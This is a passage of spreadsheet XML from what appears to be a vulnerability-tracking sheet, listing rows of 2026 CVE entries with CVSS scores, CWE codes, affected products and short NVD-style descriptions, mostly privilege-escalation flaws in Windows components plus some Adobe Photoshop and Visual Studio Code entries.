        </is>
      </c>
      <c r="S284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69594</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr"/>
      <c r="Q285" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69594</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69787</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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6" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr"/>
      <c r="Q286" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70334</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr"/>
      <c r="K287" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr"/>
      <c r="Q287" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>Incomplete list of disallowed inputs in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="S287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70334</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70572</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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8" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr"/>
      <c r="Q288" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70581</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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9" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr"/>
      <c r="Q289" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-20</t>
        </is>
      </c>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72941</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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0" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr"/>
      <c r="Q290" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72946</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr"/>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr"/>
      <c r="Q291" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Storage Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72946</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72988</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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2" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr"/>
      <c r="Q292" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72992</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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3" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr"/>
      <c r="Q293" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72993</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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4" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr"/>
      <c r="Q294" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72994</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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5" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr"/>
      <c r="Q295" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72997</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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6" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr"/>
      <c r="Q296" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73000</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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7" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr"/>
      <c r="Q297" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73015</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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8" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr"/>
      <c r="Q298" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73020</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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9" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr"/>
      <c r="Q299" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75771</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr"/>
      <c r="K300" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr"/>
      <c r="Q300" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R300"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00" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75771</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75862</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr"/>
      <c r="Q301" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R301"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01" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75862</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75863</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr"/>
      <c r="K302" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr"/>
      <c r="Q302" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R302"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02" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75863</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77091</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
